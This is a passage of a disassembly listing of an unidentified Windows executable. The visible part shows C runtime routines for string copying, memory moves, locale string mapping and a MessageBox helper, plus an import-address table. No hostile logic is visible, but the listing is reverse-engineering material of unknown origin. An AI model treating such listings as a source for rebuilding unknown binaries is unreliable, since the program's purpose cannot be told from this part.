ja short loc_404611
lea eax, [edi+10h]
loc_4045D8: ; CODE XREF: sub_404568+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_4045D8
loc_404611: ; CODE XREF: sub_404568+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40464E
or [eax+4], edi
loc_40464E: ; CODE XREF: sub_404568+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40465E: ; CODE XREF: sub_404568+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404568 endp
; =============== S U B R O U T I N E =======================================
sub_404663 proc near ; CODE XREF: sub_4036B9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_407240, ebx
push esi
push edi
jnz short loc_4046B2
push offset aUser32_dll ; "user32.dll"
call ds:dword_405060 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4046E8
mov esi, ds:dword_4050B0
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov ds:dword_407240, eax
jz short loc_4046E8
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_407244, eax
call esi ; GetProcAddress
mov ds:dword_407248, eax
loc_4046B2: ; CODE XREF: sub_404663+B�j
mov eax, ds:dword_407244
test eax, eax
jz short loc_4046D1
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4046D1
mov eax, ds:dword_407248
test eax, eax
jz short loc_4046D1
push ebx
call eax
mov ebx, eax
loc_4046D1: ; CODE XREF: sub_404663+56�j
; sub_404663+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call ds:dword_407240
loc_4046E4: ; CODE XREF: sub_404663+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4046E8: ; CODE XREF: sub_404663+1C�j
; sub_404663+33�j
xor eax, eax
jmp short loc_4046E4
sub_404663 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4046F0 proc near ; CODE XREF: sub_4036B9+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404773
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_404714
shr ecx, 2
jnz short loc_404781
jmp short loc_404735
; ---------------------------------------------------------------------------
loc_404714: ; CODE XREF: sub_4046F0+1B�j
; sub_4046F0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_404742
test al, al
jz short loc_40474A
test esi, 3
jnz short loc_404714
mov ebx, ecx
shr ecx, 2
jnz short loc_404781
loc_404730: ; CODE XREF: sub_4046F0+8F�j
and ebx, 3
jz short loc_404742
loc_404735: ; CODE XREF: sub_4046F0+22�j
; sub_4046F0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40476E
dec ebx
jnz short loc_404735
loc_404742: ; CODE XREF: sub_4046F0+2B�j
; sub_4046F0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40474A: ; CODE XREF: sub_4046F0+2F�j
test edi, 3
jz short loc_404764
loc_404752: ; CODE XREF: sub_4046F0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4047E6
test edi, 3
jnz short loc_404752
loc_404764: ; CODE XREF: sub_4046F0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4047D7
loc_40476B: ; CODE XREF: sub_4046F0+7F�j
; sub_4046F0+F4�j
mov [edi], al
inc edi
loc_40476E: ; CODE XREF: sub_4046F0+4D�j
dec ebx
jnz short loc_40476B
pop ebx
pop esi
loc_404773: ; CODE XREF: sub_4046F0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404779: ; CODE XREF: sub_4046F0+A9�j
; sub_4046F0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_404730
loc_404781: ; CODE XREF: sub_4046F0+20�j
; sub_4046F0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404779
test dl, dl
jz short loc_4047CB
test dh, dh
jz short loc_4047C1
test edx, 0FF0000h
jz short loc_4047B7
test edx, 0FF000000h
jnz short loc_404779
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047B7: ; CODE XREF: sub_4046F0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047C1: ; CODE XREF: sub_4046F0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047CB: ; CODE XREF: sub_4046F0+AD�j
xor edx, edx
mov [edi], edx
loc_4047CF: ; CODE XREF: sub_4046F0+C5�j
; sub_4046F0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4047E1
loc_4047D7: ; CODE XREF: sub_4046F0+79�j
xor eax, eax
loc_4047D9: ; CODE XREF: sub_4046F0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4047D9
loc_4047E1: ; CODE XREF: sub_4046F0+E5�j
and ebx, 3
jnz short loc_40476B
loc_4047E6: ; CODE XREF: sub_4046F0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4046F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4047EE proc near ; CODE XREF: sub_403BD6+BE�p
; sub_403BD6+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405498
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_40726C, edi
jnz short loc_404864
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_405448
mov esi, 100h
push esi
push edi
call ds:dword_4050AC ; LCMapStringW
test eax, eax
jz short loc_404842
mov ds:dword_40726C, ebx
jmp short loc_404864
; ---------------------------------------------------------------------------
loc_404842: ; CODE XREF: sub_4047EE+4A�j
push edi
push edi
push ebx
push offset dword_4070C8
push esi
push edi
call ds:dword_4050B4 ; LCMapStringA
test eax, eax
jz loc_40497C
mov ds:dword_40726C, 2
loc_404864: ; CODE XREF: sub_4047EE+2E�j
; sub_4047EE+52�j
cmp [ebp+arg_C], edi
jle short loc_404879
push [ebp+arg_C]
push [ebp+arg_8]
call sub_404A12
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_404879: ; CODE XREF: sub_4047EE+79�j
mov eax, ds:dword_40726C
cmp eax, 2
jnz short loc_4048A0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050B4 ; LCMapStringA
jmp loc_40497E
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_4047EE+93�j
cmp eax, 1
jnz loc_40497C
cmp [ebp+arg_18], edi
jnz short loc_4048B6
mov eax, ds:dword_407264
mov [ebp+arg_18], eax
loc_4048B6: ; CODE XREF: sub_4047EE+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_405084 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_40497C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404911
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_404911: ; CODE XREF: sub_4047EE+10E�j
cmp [ebp+var_24], edi
jz short loc_40497C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_405084 ; MultiByteToWideChar
test eax, eax
jz short loc_40497C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050AC ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40497C
test byte ptr [ebp+arg_4+1], 4
jz short loc_404990
cmp [ebp+arg_14], edi
jz loc_404A0B
cmp esi, [ebp+arg_14]
jg short loc_40497C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050AC ; LCMapStringW
test eax, eax
jnz loc_404A0B
loc_40497C: ; CODE XREF: sub_4047EE+66�j
; sub_4047EE+B5�j ...
xor eax, eax
loc_40497E: ; CODE XREF: sub_4047EE+AD�j
; sub_4047EE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404990: ; CODE XREF: sub_4047EE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4049C4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4049C4: ; CODE XREF: sub_4047EE+1C2�j
cmp ebx, edi
jz short loc_40497C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4050AC ; LCMapStringW
test eax, eax
jz short loc_40497C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4049EB
push edi
push edi
jmp short loc_4049F1
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4047EE+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4049F1: ; CODE XREF: sub_4047EE+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_4050C0 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40497C
loc_404A0B: ; CODE XREF: sub_4047EE+165�j
; sub_4047EE+188�j
mov eax, esi
jmp loc_40497E
sub_4047EE endp
; =============== S U B R O U T I N E =======================================
sub_404A12 proc near ; CODE XREF: sub_4047EE+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_404A2F
loc_404A22: ; CODE XREF: sub_404A12+1B�j
cmp byte ptr [eax], 0
jz short loc_404A2F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_404A22
loc_404A2F: ; CODE XREF: sub_404A12+E�j
; sub_404A12+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_404A3A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_404A3A: ; CODE XREF: sub_404A12+21�j
mov eax, edx
retn
sub_404A12 endp
; =============== S U B R O U T I N E =======================================
sub_404A3D proc near ; CODE XREF: sub_403DB8+1F�p
arg_0 = dword ptr 4
mov eax, ds:dword_407274
test eax, eax
jz short loc_404A55
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_404A55
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404A55: ; CODE XREF: sub_404A3D+7�j
; sub_404A3D+12�j
xor eax, eax
retn
sub_404A3D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A60 proc near ; CODE XREF: sub_403E83+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404A80
cmp edi, eax
jb loc_404BF8
loc_404A80: ; CODE XREF: sub_404A60+16�j
test edi, 3
jnz short loc_404A9C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp ds:off_404BA8[edx*4]
; ---------------------------------------------------------------------------
loc_404A9C: ; CODE XREF: sub_404A60+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_404AB4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_404ABC+4[eax*4]
; ---------------------------------------------------------------------------
loc_404AB4: ; CODE XREF: sub_404A60+46�j
jmp dword ptr ds:loc_404BB8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404ABC: ; CODE XREF: sub_404A60+31�j
; sub_404A60+8E�j ...
jmp ds:off_404B3C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404AD0
dd offset loc_404AFC
dd offset loc_404B20
; ---------------------------------------------------------------------------
loc_404AD0: ; DATA XREF: sub_404A60+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp ds:off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404AFC: ; DATA XREF: sub_404A60+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp ds:off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404B20: ; DATA XREF: sub_404A60+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp ds:off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404B3C dd offset loc_404B9F ; DATA XREF: sub_404A60:loc_404ABC�r
dd offset loc_404B8C
dd offset loc_404B84
dd offset loc_404B7C
dd offset loc_404B74
dd offset loc_404B6C
dd offset loc_404B64
dd offset loc_404B5C
; ---------------------------------------------------------------------------
loc_404B5C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404B64: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404B6C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404B74: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404B7C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404B84: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404B8C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404B9F: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60:off_404B3C�o
jmp ds:off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404BA8 dd offset loc_404BB8 ; DATA XREF: sub_404A60+35�r
; sub_404A60+92�r ...
dd offset loc_404BC0
dd offset loc_404BCC
dd offset loc_404BE0
; ---------------------------------------------------------------------------
loc_404BB8: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404BC0: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404BCC: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404BE0: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404BF8: ; CODE XREF: sub_404A60+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404C2C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp ds:off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404C20: ; CODE XREF: sub_404A60+1B1�j
; sub_404A60+208�j ...
neg ecx
jmp ds:off_404CF0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404C2C: ; CODE XREF: sub_404A60+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404C44
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_404C44+4[eax*4]
; ---------------------------------------------------------------------------
loc_404C44: ; CODE XREF: sub_404A60+1D6�j
; DATA XREF: sub_404A60+1DD�r
jmp ds:off_404D40[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404C58
dd offset loc_404C78
dd offset loc_404CA0
; ---------------------------------------------------------------------------
loc_404C58: ; DATA XREF: sub_404A60+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp ds:off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404C78: ; DATA XREF: sub_404A60+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp ds:off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404CA0: ; DATA XREF: sub_404A60+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404C20
std
rep movsd
cld
jmp ds:off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404CF4
dd offset loc_404CFC
dd offset loc_404D04
dd offset loc_404D0C
dd offset loc_404D14
dd offset loc_404D1C
dd offset loc_404D24
off_404CF0 dd offset loc_404D37 ; DATA XREF: sub_404A60+1C2�r
; ---------------------------------------------------------------------------
loc_404CF4: ; DATA XREF: sub_404A60+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404CFC: ; DATA XREF: sub_404A60+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404D04: ; DATA XREF: sub_404A60+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404D0C: ; DATA XREF: sub_404A60+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404D14: ; DATA XREF: sub_404A60+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404D1C: ; DATA XREF: sub_404A60+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404D24: ; DATA XREF: sub_404A60+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404D37: ; CODE XREF: sub_404A60+1C2�j
; DATA XREF: sub_404A60:off_404CF0�o
jmp ds:off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404D40 dd offset loc_404D50 ; DATA XREF: sub_404A60+1B7�r
; sub_404A60:loc_404C44�r ...
dd offset loc_404D58
dd offset loc_404D68
dd offset loc_404D7C
; ---------------------------------------------------------------------------
loc_404D50: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D58: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D68: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D7C: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404A60 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D96 proc near ; CODE XREF: sub_401B1B+33�p
jmp ds:dword_405148
sub_404D96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D9C proc near ; CODE XREF: sub_401B1B+24�p
jmp ds:dword_405140
sub_404D9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404DA2 proc near ; CODE XREF: sub_401B1B+7�p
jmp ds:dword_405144
sub_404DA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404DA8 proc near ; CODE XREF: sub_4034B0+13�p
jmp ds:dword_40508C
sub_404DA8 endp
; ---------------------------------------------------------------------------
align 10h
dd 94h dup(0)
dword_405000 dd 77DD189Ah ; DATA XREF: sub_401AED+26�r
; sub_40219B+C8�r
dword_405004 dd 77DD59F0h ; DATA XREF: sub_40219B+BF�r
dword_405008 dd 77E2A571h ; DATA XREF: sub_4020D9+92�r
dword_40500C dd 77DD5ECCh ; DATA XREF: sub_401AED+D�r
; sub_40219B+97�r
dword_405010 dd 77DD5C55h ; DATA XREF: sub_401AED+1D�r
align 8
dword_405018 dd 77E73167h ; DATA XREF: sub_4010D2+76�r
; sub_40126C+8F�r ...
dword_40501C dd 77E6E32Eh ; DATA XREF: sub_401210+52�r
; sub_401B59+2AB�r
dword_405020 dd 77E6D09Bh ; DATA XREF: sub_401210+31�r
dword_405024 dd 77E6E4FDh ; DATA XREF: sub_401210+22�r
dword_405028 dd 77E6D071h ; DATA XREF: sub_401210+E�r
dword_40502C dd 77E61BE6h ; DATA XREF: sub_40126C+FB�r
; sub_401583+4D0�r ...
dword_405030 dd 77E6E4C8h ; DATA XREF: sub_401B59+275�r
dword_405034 dd 77E99331h ; DATA XREF: sub_401B59+259�r
dword_405038 dd 77E7A099h ; DATA XREF: sub_401B59+24A�r
; sub_401F4B+14D�r ...
dword_40503C dd 77E7AC37h ; DATA XREF: sub_401EC0+7B�r
; sub_4020D9:loc_40213A�r
dword_405040 dd 77E684C6h ; DATA XREF: sub_401F4B+17B�r
dword_405044 dd 77E715F7h ; DATA XREF: sub_401F4B+13�r
dword_405048 dd 77E73163h ; DATA XREF: sub_401F4B+C�r
dword_40504C dd 77F5157Dh ; DATA XREF: sub_4020D9+4E�r
dword_405050 dd 77E7C2C4h ; DATA XREF: sub_4020D9+48�r
dword_405054 dd 77E7751Ah ; DATA XREF: sub_4020D9+5�r
dword_405058 dd 77E6BD13h ; DATA XREF: sub_40219B+82�r
dword_40505C dd 77E705B0h ; DATA XREF: sub_40219B+28�r
dword_405060 dd 77E805D8h ; DATA XREF: sub_404663+12�r
dword_405064 dd 77F5722Fh ; DATA XREF: sub_4044B7+28�r
dword_405068 dd 77E7980Ah ; DATA XREF: sub_4044B7+76�r
; sub_404568+51�r
dword_40506C dd 77F516F8h ; DATA XREF: sub_403DE4+2E�r
; sub_403E1A+D�r ...
dword_405070 dd 77E6C703h ; DATA XREF: sub_403B30+1A�r
dword_405074 dd 77E7A13Fh ; DATA XREF: sub_403B30+2F�r
dword_405078 dd 77E7849Fh ; DATA XREF: sub_403997+48�r
; sub_403BD6+14�r
dword_40507C dd 77E7C866h ; DATA XREF: sub_40380C+3F�r
; sub_40380C+12D�r
dword_405080 dd 77E641EBh ; DATA XREF: sub_40380C+59�r
; sub_40380C+8D�r
dword_405084 dd 77E77CCEh ; DATA XREF: sub_40380C+C5�r
; sub_40380C+11B�r ...
dword_405088 dd 77E79D8Ch ; DATA XREF: sub_4036B9+14A�r
dword_40508C dd 77F6183Eh ; DATA XREF: sub_404DA8�r
dword_405090 dd 77F51597h ; DATA XREF: sub_403D77+27�r
; sub_403E83+2C4�r ...
dword_405094 dd 77E79E34h ; DATA XREF: sub_403E83+23F�r
dword_405098 dd 77E7C726h ; DATA XREF: sub_403472+11�r
dword_40509C dd 77E76E0Bh ; DATA XREF: sub_403472+2F�r
dword_4050A0 dd 77E78406h ; DATA XREF: sub_4032C7+FF�r
; sub_4032C7+166�r
dword_4050A4 dd 77E79C3Dh ; DATA XREF: sub_4032C7+158�r
; sub_4036B9+143�r
dword_4050A8 dd 77E7C931h ; DATA XREF: sub_4032C7+19D�r
dword_4050AC dd 77E781F9h ; DATA XREF: sub_4047EE+42�r
; sub_4047EE+14D�r ...
dword_4050B0 dd 77E7A5FDh ; DATA XREF: sub_404663+1E�r
dword_4050B4 dd 77E77405h ; DATA XREF: sub_4047EE+5E�r
; sub_4047EE+A7�r
dword_4050B8 dd 77E77EE1h ; DATA XREF: sub_403195+9�r
dword_4050BC dd 77E67702h ; DATA XREF: sub_403195:loc_4031C4�r
; sub_403195+E1�r
dword_4050C0 dd 77E79924h ; DATA XREF: sub_403195+7E�r
; sub_4047EE+20D�r
dword_4050C4 dd 77E7C9E1h ; DATA XREF: sub_403195+CE�r
dword_4050C8 dd 77E79F93h ; DATA XREF: sub_40292E+C2�r
dword_4050CC dd 77E6177Ah ; DATA XREF: sub_40292E+9F�r
; sub_4032C7+59�r
dword_4050D0 dd 77E7C938h ; DATA XREF: sub_40292E+74�r
dword_4050D4 dd 77E7C486h ; DATA XREF: sub_40292E+26�r
dword_4050D8 dd 77E75CB5h ; DATA XREF: sub_402A49+1D�r
; sub_402C00+91�r
dword_4050DC dd 77E616B4h ; DATA XREF: sub_402C00+17�r
dword_4050E0 dd 77E79C90h ; DATA XREF: sub_402C00+10�r
dword_4050E4 dd 77EB9A84h ; DATA XREF: sub_402CB3+138�r
dword_4050E8 dd 77E9C5B1h ; DATA XREF: sub_403195+11F�r
align 10h
dword_4050F0 dd 77D4C96Ah ; DATA XREF: sub_40126C+B7�r
; sub_40137D+26�r ...
dword_4050F4 dd 77D6ADD7h ; DATA XREF: sub_4020D9+BA�r
dd 0
dword_4050FC dd 762211EFh ; DATA XREF: sub_401F4B+25�r
dd 0
dword_405104 dd 71AB41DAh ; DATA XREF: sub_401028+10�r
dword_405108 dd 71AB3ECEh ; DATA XREF: sub_401EC0+43�r
dword_40510C dd 71AB5DE2h ; DATA XREF: sub_401EC0+51�r
dword_405110 dd 71AB868Dh ; DATA XREF: sub_401EC0+68�r
dword_405114 dd 71AB5690h ; DATA XREF: sub_40137D+179�r
